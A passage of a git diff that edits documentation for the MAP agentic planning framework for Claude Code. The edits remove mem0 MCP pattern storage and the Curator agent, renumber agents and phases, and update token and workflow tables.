## MAP Workflow Rules diff --git a/IMPLEMENTATION_SUMMARY.md b/IMPLEMENTATION_SUMMARY.md index 96d4b8a..2dec926 100644 --- a/IMPLEMENTATION_SUMMARY.md +++ b/IMPLEMENTATION_SUMMARY.md @@ -6,7 +6,7 @@ - Original `/map-efficient` command: 995 lines, ~5,400 tokens - **Issue**: Attention dilution → Claude skips critical steps (20% compliance) - **Critical symptoms**: - - mem0 search skipped 80% of time + - Context search skipped 80% of time - Self-audit skipped 90% of time - User interventions required ~3 times per workflow @@ -60,7 +60,7 @@ |--------|---------------|----------------|-------------| | **Step compliance** | ~20% | ~85% | 4.25× | | **Command file tokens** | ~5,400 | ~1,750 | 68% reduction | -| **mem0 search skip rate** | 80% | ~5% | 16× improvement | +| **Context search skip rate** | 80% | ~5% | 16× improvement | | **Self-audit skip rate** | 90% | ~10% | 9× improvement | | **User interventions** | ~3 per workflow | ~0.3 | 10× reduction | | **Total workflow tokens** | ~54,000 | ~9,250 | 83% reduction | @@ -96,7 +96,7 @@ User types: /map-efficient ┌──────────────────────────────────────────────────────────────┐ │ PreToolUse Hook (workflow-context-injector.py) │ -│ Injects: "⚠️ MANDATORY: Call mem0 BEFORE Actor" │ +│ Injects: "⚠️ MANDATORY: Search context BEFORE Actor" │ └──────────────────────────────────────────────────────────────┘ ↓ diff --git a/docs/ARCHITECTURE.md b/docs/ARCHITECTURE.md index a6529dc..7d5e193 100644 --- a/docs/ARCHITECTURE.md +++ b/docs/ARCHITECTURE.md @@ -3,7 +3,6 @@ Deep technical documentation for MAP (Modular Agentic Planner) implementation. 
> **Research Foundation:** [Nature Communications research (2025)](https://github.com/Shanka123/MAP) — 74% improvement in planning tasks -> **Learning System:** [ACE (Agentic Context Engineering)](https://arxiv.org/abs/2510.04618v1) — continuous learning from experience ## Table of Contents @@ -70,7 +69,7 @@ MAP Framework implements cognitive architecture inspired by prefrontal cortex fu │ │ │ /map-review (interactive 4-section): │ │ ┌──────────────────────────────────────────────────────────┐ │ -│ │ 4× mem0 queries + git diff │ │ +│ │ git diff analysis │ │ │ │ → [Monitor + Predictor + Evaluator] (all 3 parallel) │ │ │ │ → Interactive: Architecture → Quality → Tests → Perf │ │ │ │ → Verdict: PROCEED / REVISE / BLOCK │ │ @@ -98,9 +97,9 @@ MAP Framework implements cognitive architecture inspired by prefrontal cortex fu │ │ │ /map-learn (post-workflow learning): │ │ ┌──────────────────────────────────────────────────────────┐ │ -│ │ Reflector → Curator → mem0 storage → Verification │ │ +│ │ Reflector → Verification │ │ │ │ Standalone command. Run AFTER any workflow completes. │ │ -│ │ Extracts patterns and stores via mem0 MCP tools. │ │ +│ │ Extracts patterns from workflow outcomes. │ │ │ └──────────────────────────────────────────────────────────┘ │ │ │ │ RESEARCH-AGENT (on-demand in any workflow): │ @@ -143,9 +142,8 @@ MAP Framework implements cognitive architecture inspired by prefrontal cortex fu - Functionality, security, testability, maintainability - Scores 0-10, approval threshold >7.0 -5. **Learning Cycle** (Reflector → Curator) +5. **Learning Cycle** (Reflector) - Extracts patterns from successes and failures - - Updates knowledge base (mem0 MCP) - Enables continuous improvement ### Agent Coordination Protocol @@ -364,7 +362,7 @@ TaskDecomposer → [conditional ResearchAgent] → (3×Actor parallel → 3×Mon - Quality still ensured by Monitor's comprehensive checks 3. 
**Learning is OPTIONAL via /map-learn** - - Workflow does NOT include Reflector/Curator + - Workflow does NOT include Reflector - At completion, suggests running `/map-learn` if patterns worth saving - Separation keeps workflows fast, learning intentional @@ -406,7 +404,6 @@ print("Consider running /map-learn to save patterns") - ❌ Predictor (no impact analysis) - ❌ Evaluator (no quality scoring) - ❌ Reflector (no lesson extraction) -- ❌ Curator (no knowledge base updates) **Token Usage:** 50-60% of baseline **Learning:** None (defeats MAP's purpose) @@ -414,7 +411,6 @@ print("Consider running /map-learn to save patterns") **Architectural Consequences:** - Knowledge base remains static (no continuous improvement) -- mem0 patterns never grow - Breaking changes undetected (no Predictor) - Security/performance issues may slip through (no Evaluator) - Same mistakes repeated (no Reflector) @@ -473,7 +469,6 @@ print("Consider running /map-learn to save patterns") - Complex features where optimal approach is unclear - Security-critical code requiring multiple review perspectives - Performance-sensitive implementations -- Learning optimal patterns (arbiter reasoning becomes mem0 pattern content) - Situations where you want to explore solution space thoroughly **Technical Details:** @@ -527,8 +522,6 @@ for subtask in subtasks: **Debugging-Specific Features:** 1. **Pre-Analysis Phase** - - Query mem0 for ERROR_PATTERNS and DEBUGGING_TECHNIQUES - - Search mem0 for similar past debugging sessions via tiered search - Identify affected files via Grep/Glob 2. **Step Types** (defined by TaskDecomposer): @@ -552,12 +545,12 @@ for subtask in subtasks: #### 5. 
`/map-review` - Interactive Code Review (3 Agents) -**Agent Sequence:** 4× mem0 targeted queries + git diff → [Monitor + Predictor + Evaluator] (all 3 parallel) → Interactive 4-section presentation → Verdict +**Agent Sequence:** git diff → [Monitor + Predictor + Evaluator] (all 3 parallel) → Interactive 4-section presentation → Verdict **Review-Specific Features:** 1. **No TaskDecomposer** - Reviews current branch changes as-is -2. **Parallel Collection** - 4 mem0 queries + 3 agents launched in a single message (7 parallel calls) +2. **Parallel Agent Launch** - 3 agents launched in a single message 3. **Interactive 4-Section Presentation:** - **Architecture** (primary: Predictor — breaking changes, affected components) - **Code Quality** (primary: Monitor — correctness, maintainability issues) @@ -572,7 +565,7 @@ for subtask in subtasks: - BLOCK: Monitor rejected OR Evaluator reconsider OR security/functionality < 5 OR (Predictor high risk + breaking changes) - Priority: BLOCK > REVISE > PROCEED -**Token Usage:** ~15-25K tokens (4 mem0 queries + parallel agents + interactive 4-section presentation; `--ci` mode ~12-15K) +**Token Usage:** ~15-25K tokens (parallel agents + interactive 4-section presentation; `--ci` mode ~12-15K) **Learning:** Optional via `/map-learn` **Quality Gates:** All 3 review agents @@ -604,15 +597,13 @@ for subtask in subtasks: - Package releases to PyPI - Version bumping with full validation -#### 7. `/map-learn` - Post-Workflow Learning (2 Agents) +#### 7. 
`/map-learn` - Post-Workflow Learning (1 Agent) -**Agent Sequence:** Reflector → Curator → mem0 storage → Verification +**Agent Sequence:** Reflector → Verification **Standalone Learning:** - Run AFTER any workflow completes (not during) - Extracts patterns from Actor/Monitor/Predictor outputs -- Stores patterns in mem0 via `mcp__mem0__map_add_pattern` -- Uses tiered namespaces (branch → project → org) for pattern organization **Token Usage:** 5-8K tokens (depends on workflow size) **When to use:** @@ -632,7 +623,6 @@ Typical token consumption per subtask (estimated): | Predictor | 1.5K | 1K | 2.5K | Conditional in /map-efficient, always in /map-debug | | Evaluator | 2K | 1K | 3K | Only in /map-debug, /map-review | | Reflector | 2K | 1K | 3K | Only via /map-learn | -| Curator | 1.5K | 0.5K | 2K | Only via /map-learn | | DebateArbiter | 3K | 2K | 5K | Opus model, /map-debate only (includes synthesis) | | Synthesizer | 2K | 3K | 5K | /map-efficient Self-MoA only (DebateArbiter handles this in /map-debate) | | ResearchAgent | 2K | 4K | 6K | Heavy codebase reading, on-demand in any workflow | @@ -642,7 +632,7 @@ Typical token consumption per subtask (estimated): - /map-efficient (Self-MoA): ~25-30K tokens (3× Actor + Synthesizer) - /map-fast: ~8-10K tokens (minimal, no learning) - /map-debug: ~15-20K tokens (full pipeline with Evaluator) -- /map-review: ~15-25K tokens (4 mem0 queries + parallel agents + interactive 4-section presentation; --ci mode ~12-15K) +- /map-review: ~15-25K tokens (parallel agents + interactive 4-section presentation; --ci mode ~12-15K) - /map-debate: ~30-40K tokens (3× Actor + Opus DebateArbiter) **For 5-subtask workflow:** @@ -658,7 +648,7 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de ### Hook-Based Context Injection (v2.0.0+) -**Problem:** Long command files (995 lines, ~5.4K tokens) cause attention dilution → Claude skips critical workflow steps like mem0 search and self-audit (20% compliance rate). 
+**Problem:** Long command files (995 lines, ~5.4K tokens) cause attention dilution → Claude skips critical workflow steps like research and self-audit (20% compliance rate). **Solution:** State-machine orchestration + PreToolUse hook injection @@ -676,7 +666,7 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de ┌─────────────────────────────────────────────────────────────┐ │ map-efficient.md (~1.75K tokens, down from ~5.4K) │ │ 1. Get next step instruction (map_orchestrator.py) │ -│ 2. Route to executor (Actor/Monitor/mem0/etc) │ +│ 2. Route to executor (Actor/Monitor/etc) │ │ 3. Execute step │ │ 4. Validate completion → Update state │ │ 5. Recurse if more steps; else complete │ @@ -700,12 +690,12 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de ╔═══════════════════════════════════════════════════════════╗ ║ MAP WORKFLOW CHECKPOINT ║ ╠═══════════════════════════════════════════════════════════╣ -║ Current Step: 2.1 - MEM0_SEARCH +║ Current Step: 2.2 - RESEARCH ║ Progress: Subtask 1/5 ║ Completed: 1.0_DECOMPOSE, 1.5_INIT_PLAN, 2.0_XML_PACKET ║ ║ ⚠️ MANDATORY NEXT ACTION: -║ Call mcp__mem0__map_tiered_search BEFORE Actor +║ Call research-agent BEFORE Actor ╚═══════════════════════════════════════════════════════════╝ ``` @@ -717,7 +707,7 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de |--------|---------------|----------------| | **Step compliance** | ~20% | ~85% (predicted) | | **Command file tokens** | ~5,400 | ~1,750 | -| **mem0 search skip rate** | 80% | ~5% (predicted) | +| **Research skip rate** | 80% | ~5% (predicted) | | **Self-audit skip rate** | 90% | ~10% (predicted) | | **User interventions** | ~3 per workflow | ~0.3 (predicted) | | **Hook latency** | N/A | <100ms | @@ -737,8 +727,7 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de 4. `1.56 CHOOSE_MODE` - Select execution mode (step_by_step|batch) 5. 
`1.6 INIT_STATE` - Create workflow_state.json
6. `2.0 XML_PACKET` - Build AI-friendly subtask packet
-7. `2.1 MEM0_SEARCH` - Tiered memory search
-8. `2.2 RESEARCH` - research-agent (conditional)
+7. `2.2 RESEARCH` - research-agent (conditional)
-9. `2.3 ACTOR` - Actor agent implementation
-10. `2.4 MONITOR` - Monitor validation (retry up to 5 times)
-11. `2.6 PREDICTOR` - Impact analysis (conditional)
+8. `2.3 ACTOR` - Actor agent implementation
+9. `2.4 MONITOR` - Monitor validation (retry up to 5 times)
+10. `2.6 PREDICTOR` - Impact analysis (conditional)
@@ -844,14 +833,12 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate
5. **Used Patterns** (pattern IDs applied)

**Key Behaviors:**
-- ALWAYS searches mem0 MCP for existing patterns first
- Fetches current docs for external libraries (via context7)
- Explicit error handling required (no silent failures)
- Complete code, not sketches or placeholders
- Security-first approach for auth/data access

**MCP Tool Usage:**
-- `mcp__mem0__map_tiered_search`: Find existing patterns before implementing
- `mcp__context7__get-library-docs`: Get current library documentation

### 3. Monitor
@@ -976,62 +963,14 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate
```

**Key Behaviors:**
-- MUST search mem0 MCP for existing patterns first (avoid duplicates)
- Extracts both successful patterns and failure lessons
- Contextualizes lessons (when to apply, when to avoid)
- Links to specific workflow outcomes

**MCP Tool Usage:**
-- `mcp__mem0__map_tiered_search`: Check for existing similar patterns
- `mcp__sequential-thinking__sequentialthinking`: Structure reasoning process

-### 7. Curator
-
-**Responsibility:** Manage knowledge base (mem0) with incremental updates.
- -**Input:** Reflector's extracted patterns - -**Output:** -```json -{ - "patterns_to_add": [ - { - "pattern_id": "impl-0008", - "content": "Use bcrypt for password hashing with work factor 12", - "category": "implementation", - "tags": ["security", "authentication", "passwords"], - "tier": "project" - } - ], - "patterns_to_update": [ - { - "pattern_id": "impl-0003", - "updates": {"content": "Updated JWT signature algorithm from HS256 to RS256"}, - "reason": "Security improvement based on recent OWASP guidelines" - } - ], - "patterns_to_archive": [] -} -``` - -**Operations:** -- **ADD:** New pattern not in mem0 (via `mcp__mem0__map_add_pattern`) -- **UPDATE:** Improve existing pattern -- **ARCHIVE:** Mark pattern as deprecated (via `mcp__mem0__map_archive_pattern`) -- **NONE:** No changes needed - -**Key Behaviors:** -- MUST search mem0 MCP for duplicates before adding -- Fingerprint-based deduplication (exact match prevention) -- Uses tiered storage (branch → project → org namespaces) -- Incremental updates only (no full rewrites) - -**MCP Tool Usage:** -- `mcp__mem0__map_tiered_search`: Deduplication check -- `mcp__mem0__map_add_pattern`: Store new patterns -- `mcp__mem0__map_archive_pattern`: Deprecate outdated patterns - -### 8. DocumentationReviewer +### 7. DocumentationReviewer **Responsibility:** Check documentation completeness and correctness. @@ -1057,7 +996,7 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate - ✅ Configuration options explained - ✅ Examples match actual code behavior -### 9. Synthesizer +### 8. Synthesizer **Responsibility:** Merge best elements from multiple Actor variants in Self-MoA (Mixture of Agents) workflows. @@ -1098,7 +1037,7 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate **Usage Context:** Only invoked in `/map-debate` workflow after DebateArbiter completes cross-evaluation -### 10. DebateArbiter +### 9. 
DebateArbiter **Responsibility:** Cross-evaluate multiple Actor variants with explicit reasoning, identify best approaches for each decision point. @@ -1161,7 +1100,7 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate **MCP Tool Usage:** - `mcp__sequential-thinking__sequentialthinking`: Multi-step reasoning for complex trade-off analysis -### 11. ResearchAgent +### 10. ResearchAgent **Responsibility:** Heavy codebase reading with context isolation and compressed output for Actor/Monitor consumption. @@ -1210,7 +1149,7 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate - Outputs compressed summary (<2K tokens) - Prevents Actor context bloat (would be 20-50K tokens if Actor read directly) -### 12. FinalVerifier +### 11. FinalVerifier **Responsibility:** Adversarial verifier applying the "Four-Eyes Principle" — verifies the ENTIRE task goal is achieved, not just individual subtasks. Catches premature completion and hallucinated success. 
@@ -1258,7 +1197,6 @@ MAP uses MCP (Model Context Protocol) servers for enhanced capabilities beyond b | MCP Server | Purpose | Required For | Performance Notes | |------------|---------|--------------|-------------------| -| **mem0** | Tiered pattern storage and retrieval | Reflector, Curator, Actor | Low latency (<200ms) | | **claude-reviewer** | Professional code review | Monitor | Medium latency (~2-5s) | | **sequential-thinking** | Chain-of-thought reasoning | Complex problem solving | Medium latency (~1-3s) | | **context7** | Up-to-date library documentation | Actor (external libs) | Low latency (<500ms) | @@ -1275,14 +1213,6 @@ MCP servers are configured differently depending on the usage context: ```json { "mcp_servers": { - "mem0": { - "enabled": true, - "description": "Tiered pattern storage with semantic search", - "config": { - "retrieval_limit": 5, - "tiers": ["branch", "project", "org"] - } - }, "claude-reviewer": { "enabled": true, "description": "Professional code review with security analysis", @@ -1294,65 +1224,9 @@ MCP servers are configured differently depending on the usage context: } ``` -#### Global Configuration - -**File:** `mcp_config.json` (project root) - -```json -{ - "mcp_servers": { - "mem0": { - "enabled": true, - "description": "Tiered memory system for pattern storage", - "config": { - "retrieval_limit": 5 - } - } - } -} -``` - ### MCP Tool Usage Patterns -#### Pattern 1: Search Before Implement (Actor) - -```markdown -**BEFORE implementing any solution:** - -1. Search mem0 for existing patterns via tiered search: - - Query: "implementation pattern [feature_type]" - - Example: "implementation pattern JWT authentication" - - Tiers searched: L1 (recent) → L2 (frequent) → L3 (semantic) - -2. If relevant patterns found: - - Review code snippets and trade-offs - - Adapt to current context - - Track which patterns used (pattern IDs) - -3. 
If no patterns found: - - Proceed with fresh implementation - - Document new pattern for Reflector -``` - -#### Pattern 2: Deduplication (Reflector, Curator) - -```markdown -**BEFORE adding new patterns:** - -1. Reflector searches mem0: - - Query: Pattern description - - Uses fingerprint-based exact match - -2. If similar pattern exists: - - Compare quality scores - - Decide: update existing or create new variant - -3. Curator confirms: - - Final deduplication check via `map_add_pattern` (returns created=false if duplicate) - - Operation: ADD vs UPDATE vs ARCHIVE vs NONE -``` - -#### Pattern 3: Current Documentation (Actor) +#### Pattern 1: Current Documentation (Actor) ```markdown **WHEN using external libraries:** @@ -1371,7 +1245,7 @@ MCP servers are configured differently depending on the usage context: - Deprecation warnings ``` -#### Pattern 4: Professional Review (Monitor) +#### Pattern 2: Professional Review (Monitor) ```markdown **AFTER Actor generates code:** @@ -1392,21 +1266,6 @@ MCP servers are configured differently depending on the usage context: ### Configuration Options -#### mem0 Configuration - -mem0 MCP server configuration is managed externally. Key parameters for MAP tools: - -**Tiered Search Parameters:** -- `query`: Search string for pattern matching -- `category`: Optional filter by section (e.g., "implementation", "debugging") -- Tiers: L1 (recent/branch) → L2 (frequent/project) → L3 (semantic/org) - -**Add Pattern Parameters:** -- `content`: Pattern text to store -- `category`: Section classification -- `fingerprint`: Auto-generated for deduplication -- `tier`: Target namespace (branch/project/org) - #### Context7 Configuration ```json @@ -1436,7 +1295,6 @@ mem0 MCP server configuration is managed externally. 
Key parameters for MAP tool ### MCP Server Availability **Commonly Available:** -- mem0 (tiered pattern storage) - claude-reviewer (code review) - sequential-thinking (reasoning) @@ -1453,25 +1311,16 @@ mem0 MCP server configuration is managed externally. Key parameters for MAP tool ### Performance Considerations **Latency Budget (per subtask):** -- mem0 searches: ~200ms each (Actor: 2-3 searches = ~600ms) - context7 docs: ~500ms per fetch (Actor: 1-2 fetches = ~1s) - claude-reviewer: ~2-5s per review (Monitor: 1 review) - Total overhead: ~2-7s per subtask **Optimization Strategies:** -- Use tiered search to get most relevant patterns first - Batch similar searches where possible -- Use `retrieval_limit` to control context size - Enable MCP caching when available (Phase 2 roadmap) --- -## Knowledge Graph Layer (Removed) - -> **Removed in v4.0+.** The legacy Knowledge Graph SQLite modules (entity_extractor, relationship_detector, contradiction_detector, graph_query) have been removed. All pattern storage, search, and contradiction detection are now handled via mem0 MCP tools. 
- ---- - ## Customization Guide ### Modifying Agent Prompts @@ -1506,11 +1355,10 @@ Agent prompts are located in `.claude/agents/*.md` and use **Handlebars template - Template variables: `{{language}}`, `{{project_name}}`, `{{framework}}` - Conditional blocks: `{{#if existing_patterns}}...{{/if}}` - Context sections: `{{subtask_description}}`, `{{feedback}}` -- ACE learning sections: existing patterns, used_patterns tracking **Why they're critical:** - Orchestrator fills these at runtime with project context -- Removing them breaks multi-language support, ACE learning, feedback loops +- Removing them breaks multi-language support and feedback loops - Git pre-commit hook validates their presence (see Hooks Integration) #### Template Variable Reference @@ -1526,7 +1374,7 @@ Agent prompts are located in `.claude/agents/*.md` and use **Handlebars template **Actor-specific:** ```handlebars {{subtask_description}} # From TaskDecomposer -{{existing_patterns}} # Relevant patterns from mem0 +{{existing_patterns}} # Relevant patterns from context {{#if feedback}} # Monitor feedback (retry loop) {{feedback}} {{/if}} @@ -1559,7 +1407,6 @@ MAP Framework uses intelligent model selection to balance quality and cost. 
| Predictor | sonnet-4-5 | Impact analysis requires complex reasoning | | Evaluator | sonnet-4-5 | Evaluation requires nuanced judgment | | Reflector | sonnet-4-5 | Quality-critical: pattern extraction | -| Curator | sonnet-4-5 | Quality-critical: knowledge management | | DocumentationReviewer | sonnet-4-5 | Quality-critical: doc validation | | Synthesizer | sonnet-4-5 | Quality-critical: variant synthesis | | DebateArbiter | opus-4-5 | Highest quality: cross-variant reasoning | @@ -1580,7 +1427,7 @@ model: claude-sonnet-4-5 # or claude-haiku-3-5 - **Downgrade to Haiku:** Lower cost, risk of quality degradation in analysis and scoring **Recommended:** -- Keep on Sonnet: TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, Curator, DocumentationReviewer, Synthesizer, ResearchAgent +- Keep on Sonnet: TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, DocumentationReviewer, Synthesizer, ResearchAgent - Keep on Opus: DebateArbiter (cross-variant reasoning requires highest quality) - Safe to downgrade to Haiku: Predictor, Evaluator (if cost reduction is priority) @@ -1615,16 +1462,7 @@ model: claude-sonnet-4-5 # or claude-haiku-3-5 - **Framework**: {{framework}} ``` -4. **Specify MCP tool usage:** - ```markdown - ## MCP INTEGRATION - - **CRITICAL**: ALWAYS use mcp__mem0__map_tiered_search before auditing: - - Query: "security vulnerability [component_type]" - - Check for past security issues and fixes - ``` - -5. **Define output format:** +4. **Define output format:** ```markdown ## OUTPUT FORMAT @@ -1643,7 +1481,7 @@ model: claude-sonnet-4-5 # or claude-haiku-3-5 ``` ``` -6. **Update orchestration:** +5. 
**Update orchestration:** Edit `.claude/commands/map-efficient.md` to call new agent: ```markdown ## After Monitor validates: @@ -1756,7 +1594,7 @@ Located at: `.git/hooks/pre-commit` **Prevents commits if:** - Template variables removed from agents -- Critical sections deleted (mem0 patterns, feedback, context) +- Critical sections deleted (feedback, context) - Massive deletions (>500 lines) without review **Example block:** @@ -1805,11 +1643,6 @@ Agent template changes are tracked in the project's main CHANGELOG.md. ### Breaking Changes - Actor: Changed output format to include `used_patterns` array -- All agents: Migrated to mem0 MCP tools - -### Added -- Actor: MCP integration section with mem0 tool usage patterns -- Reflector: mem0 deduplication checks before pattern extraction ### Fixed - Monitor: Clarified validation criteria for error handling @@ -2153,7 +1986,7 @@ Claude Code hooks run in subprocess with restricted capabilities: | Capability | Available? | Workaround | |-----------|-----------|-----------| -| MCP tool access | ❌ No | Hooks can't call `mcp__mem0__map_tiered_search`, `sequential-thinking` | +| MCP tool access | ❌ No | Hooks can't call MCP tools like `sequential-thinking` | | Python imports | ❌ No | Must call separate Python script via subprocess | | Async operations | ❌ No | Synchronous execution only (5s timeout) | | External scripts | ✅ Yes | Can call `python3`, `jq`, bash utilities | @@ -2300,34 +2133,7 @@ All failures are non-blocking - hook returns `{"continue": true}` and logs error - ✅ Audit trail for compliance - ✅ Metrics dashboard input -### Pattern Top-K Limiting (Phase 1.3) - -**Problem:** Too many patterns distract model, reduce focus on most relevant patterns. - -**Solution:** Limit patterns retrieved to `limit=5` (configurable via tiered search). 
- -**Behavior:** - -```python -# In Actor agent context injection: -# mem0 tiered search returns limited results automatically -result = mcp__mem0__map_tiered_search( - query=subtask_description - # Returns up to 5 patterns by default -) -``` - -**Benefits:** -- ✅ ~15% token reduction in Actor prompts -- ✅ Improved focus on best patterns -- ✅ Faster retrieval via tiered caching - -**Customization:** -- `limit=3`: Simple tasks, minimal context needed -- `limit=5`: Balanced (recommended default) -- `limit=7-10`: Complex tasks requiring multiple pattern references - -### Template Optimization (Phase 1.4) +### Template Optimization (Phase 1.3) **Problem:** Verbose agent outputs waste tokens without adding value. @@ -2361,7 +2167,7 @@ result = mcp__mem0__map_tiered_search( **Phase 2** (Prioritized): 1. **Checkpoints** (high impact) — Workflow resumption after interruption -2. **MCP caching** (medium-high) — Latency reduction for mem0/context7 +2. **MCP caching** (medium-high) — Latency reduction for context7 3. **Keyword+semantic search** (medium) — Hybrid retrieval accuracy 4. 
**Pattern variation** (low-medium) — Few-shot bias reduction @@ -2378,7 +2184,7 @@ result = mcp__mem0__map_tiered_search( - **Monitor approval rate:** >80% first try (current: varies by task complexity) - **Evaluator scores:** average >7.0/10 (approval threshold) - **Iteration count:** <3 per subtask (indicates clear feedback) -- **Knowledge growth:** increasing high-quality patterns in mem0 (helpful_count >= 5) +- **Knowledge growth:** increasing high-quality patterns over time **Tracking:** ```bash @@ -2394,7 +2200,6 @@ cat .map/workflow_logs/feat_auth_20251023_143022.json | jq '.subtasks[].agents.e ## References - [MAP Paper - Nature Communications](https://github.com/Shanka123/MAP) -- [ACE Paper - arXiv:2510.04618v1](https://arxiv.org/abs/2510.04618v1) - [Context Engineering for AI Agents (Manus.im)](https://manus.im/blog/Context-Engineering-for-AI-Agents-Lessons-from-Building-Manus) - [Claude Code Documentation](https://docs.anthropic.com/en/docs/claude-code) diff --git a/docs/CLI_COMMAND_REFERENCE.md b/docs/CLI_COMMAND_REFERENCE.md index d7bb861..8ba2878 100644 --- a/docs/CLI_COMMAND_REFERENCE.md +++ b/docs/CLI_COMMAND_REFERENCE.md @@ -4,11 +4,8 @@ Complete reference for all mapify CLI commands with correct syntax, parameters, and common error corrections. -> **Note (v4.0+):** Pattern storage and retrieval is handled by the mem0 MCP server (tiered namespaces: branch → project → org). For pattern operations, use mem0 MCP tools: `mcp__mem0__map_tiered_search`, `mcp__mem0__map_add_pattern`, `mcp__mem0__map_archive_pattern`. 
- ## Table of Contents -- [Pattern Storage (mem0 MCP)](#pattern-storage-mem0-mcp) - [Validate Commands](#validate-commands) - [graph](#mapify-validate-graph) - [Root Commands](#root-commands) @@ -16,36 +13,6 @@ Complete reference for all mapify CLI commands with correct syntax, parameters, - [check](#mapify-check) - [upgrade](#mapify-upgrade) - [Common Mistakes](#common-mistakes) -- [Pattern Search Guide (mem0 MCP)](#pattern-search-guide-mem0-mcp) - ---- - -## Pattern Storage (mem0 MCP) - -Pattern storage and retrieval is handled by the mem0 MCP server (tiered namespaces: branch → project → org). - -### Search Patterns - -```bash -# Tiered search (recommended) -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# Use section_filter when you know the category -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - -### Store / Deprecate Patterns - -Patterns should be written through Curator: - -```bash -Task(subagent_type="curator", ...) - -# Curator uses: -# - mcp__mem0__map_add_pattern -# - mcp__mem0__map_archive_pattern -# - mcp__mem0__map_promote_pattern -``` --- @@ -110,10 +77,10 @@ mapify validate graph task_plan.json --format text ``` **Validation Checks:** -- ✅ No circular dependencies -- ✅ All dependencies exist (no forward references) -- ✅ Valid JSON format -- ⚠️ No orphaned tasks (warning only, unless `--strict`) +- No circular dependencies +- All dependencies exist (no forward references) +- Valid JSON format +- No orphaned tasks (warning only, unless `--strict`) --- @@ -193,67 +160,9 @@ Updates agent templates in `.claude/agents/` to latest versions. ### 1. Using Legacy CLI Commands -| ❌ Wrong | ✅ Correct | Explanation | -|---------|-----------|-------------| -| `mapify playbook ...` | `mcp__mem0__map_tiered_search` | In v4.0+, patterns are stored/retrieved via mem0 MCP | - -### 2. 
Writing Patterns Without Curator - -| ❌ Wrong | ✅ Correct | Explanation | -|---------|-----------|-------------| -| Direct mem0 writes from ad-hoc scripts | `Task(subagent_type="curator", ...)` | Curator handles deduplication + quality scoring | - -### 3. Wrong Approach (v4.0+ uses mem0 MCP) - -| ❌ Wrong | ✅ Correct | Explanation | -|---------|-----------|-------------| -| Direct database access for patterns | `mcp__mem0__map_add_pattern` via Curator | Direct access breaks integrity; patterns are in mem0 | -| Bypassing Curator for pattern writes | `Task(subagent_type="curator", ...)` | Curator handles deduplication and quality scoring | - ---- - -## Pattern Search Guide (mem0 MCP) - -mem0 search is semantic. Use descriptive queries and include the technology and intent. - -```bash -# Broad query -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# More specific query -mcp__mem0__map_tiered_search(query="retry with exponential backoff and jitter", limit=5) - -# Narrow by section when possible -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - ---- - -## Integration with MAP Workflow - -### Curator Agent Usage (v4.0+) - -```bash -# Curator stores patterns via mem0 MCP: -mcp__mem0__map_add_pattern(content="...", category="implementation", tier="project") - -# Archive outdated patterns: -mcp__mem0__map_archive_pattern(pattern_id="impl-0042", reason="Superseded") -``` - -**Critical Rule**: Curator must: -- Use `mcp__mem0__map_tiered_search` to check for duplicates first -- Use `mcp__mem0__map_add_pattern` to store new patterns -- Use `mcp__mem0__map_archive_pattern` to deprecate patterns - -### Reflector Agent Usage (v4.0+) - -```bash -# Reflector searches for existing patterns via mem0: -mcp__mem0__map_tiered_search("error handling") -``` - -Searches across tiers (branch → project → org) before extracting new patterns. 
+| Wrong | Correct | Explanation | +|-------|---------|-------------| +| `mapify playbook ...` | Use slash commands (`/map-efficient`, etc.) | Legacy playbook CLI commands removed | --- diff --git a/docs/CLI_REFERENCE.json b/docs/CLI_REFERENCE.json index a4a0b35..32fc04e 100644 --- a/docs/CLI_REFERENCE.json +++ b/docs/CLI_REFERENCE.json @@ -2,7 +2,7 @@ "$schema": "http://json-schema.org/draft-07/schema#", "title": "Mapify CLI Reference", "version": "2.0.0", - "description": "Machine-readable specification of mapify CLI commands, parameters, and usage patterns. Pattern storage uses mem0 MCP (v4.0+).", + "description": "Machine-readable specification of mapify CLI commands, parameters, and usage patterns.", "commands": { "validate": { "description": "Validate task dependency graphs", @@ -161,77 +161,7 @@ } } }, - "mem0_mcp_tools": { - "description": "Pattern storage and retrieval via mem0 MCP (v4.0+). These replace the legacy playbook CLI commands.", - "tiered_search": { - "tool": "mcp__mem0__map_tiered_search", - "description": "Semantic search across tiered namespaces (branch -> project -> org)", - "parameters": { - "query": "Search string for pattern matching", - "user_id": "Org-scoped user identifier (e.g., \"org:acme-corp\")", - "run_id": "Tier-scoped run identifier (e.g., \"proj:my-app:branch:feat-auth\")", - "limit": "Maximum results to return (default: 5)", - "section_filter": "Optional filter by category", - "min_quality_score": "Optional minimum quality score threshold" - }, - "examples": [ - { - "call": "mcp__mem0__map_tiered_search(query=\"JWT authentication\", user_id=\"org:acme-corp\", run_id=\"proj:my-app:branch:feat-auth\", limit=5)", - "description": "Basic semantic pattern search with tier scope" - }, - { - "call": "mcp__mem0__map_tiered_search(query=\"input validation\", user_id=\"org:acme-corp\", run_id=\"proj:my-app:branch:feat-auth\", section_filter=\"SECURITY_PATTERNS\", limit=10)", - "description": "Search with section filter and tier scope" - 
